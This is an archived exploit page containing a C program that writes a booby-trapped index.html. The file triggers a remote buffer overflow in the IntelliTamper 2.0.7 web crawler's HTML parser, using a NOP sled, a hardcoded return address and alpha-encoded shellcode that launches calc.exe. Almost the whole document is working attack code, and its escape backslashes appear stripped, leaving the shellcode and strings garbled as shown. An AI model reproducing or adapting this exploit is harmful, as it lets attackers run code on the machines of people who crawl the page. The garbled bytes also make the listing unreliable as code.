IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)
# Published : 2008-07-23
# Author : r0ut3r
# Previous Title : Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
# Next Title : BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)

/*
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow

Just a C version of Guido Landi's discovery.

Written by r0ut3r (writ3r [at] gmail.com)

kit:/home/r0ut3r/public_html # gcc -o intell intell.c
kit:/home/r0ut3r/public_html # ./intell
[+] Building payload
[+] Success writing to index.html
kit:/home/r0ut3r/public_html #
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
    FILE *fp;

    char payload[491]; /* 464 */

    /* calc.exe shellcode x86/alpha_mixed succeeded, final size 344 */
    unsigned char shellcode[] =
        "xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a"
        "x4ax4ax43x43x43x43x43x43x43x37x52x59x6ax41x58"
        "x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
        "x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c"
        "x4dx38x47x34x45x50x43x30x43x30x4cx4bx51x55x47"
        "x4cx4cx4bx43x4cx44x45x42x58x45x51x4ax4fx4cx4b"
        "x50x4fx45x48x4cx4bx51x4fx51x30x45x51x4ax4bx50"
        "x49x4cx4bx47x44x4cx4bx45x51x4ax4ex46x51x49x50"
        "x4dx49x4ex4cx4bx34x49x50x43x44x43x37x49x51x49"
        "x5ax44x4dx45x51x49x52x4ax4bx4cx34x47x4bx51x44"
        "x47x54x45x54x43x45x4dx35x4cx4bx51x4fx47x54x45"
        "x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f"
        "x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4a"
        "x4bx4cx49x51x4cx51x34x43x34x48x43x51x4fx50x31"
        "x4cx36x45x30x51x46x42x44x4cx4bx51x56x46x50x4c"
        "x4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4b"
        "x45x38x43x38x4bx39x4cx38x4cx43x49x50x43x5ax50"
        "x50x43x58x4ax50x4dx5ax45x54x51x4fx42x48x4cx58"
        "x4bx4ex4dx5ax44x4ex46x37x4bx4fx4ax47x42x43x46"
        "x5ax51x4cx42x57x42x49x42x4ex42x44x42x4fx42x57"
        "x43x43x51x4cx43x43x44x39x43x43x43x44x43x55x42"
        "x4dx47x43x50x32x51x4cx43x53x45x31x42x4cx42x43"
        "x46x4ex45x35x44x38x42x45x43x30x45x5ax41x41";

    char eip[4] = "x23x44x06x7d";

    char html[16] = "<a href='http://";
    char chtml[11] = "'>yahhh</a>";

    fp = fopen("index.html", "wb");
    if (fp == NULL)
    {
        perror("Failed opening index.htmln");
        return EXIT_FAILURE;
    }

    printf("[+] Building payloadn");
    memcpy(payload, html, sizeof(html));
    memset(payload+sizeof(html), 0x90, 116);
    memcpy(payload+sizeof(html)+116, shellcode, sizeof(shellcode));
    memcpy(payload+sizeof(html)+116+sizeof(shellcode)-1, eip, sizeof(eip));
    memcpy(payload+sizeof(html)+116+sizeof(shellcode)-1+sizeof(eip), chtml, sizeof(chtml));

    fprintf(fp, "%s", payload);
    if (fclose(fp) == 0)
        printf("[+] Success writing to index.htmln");
    else
        printf("[-] Failed writing to index.htmln");

    return 0;
}

// www.Syue.com [2008-07-23]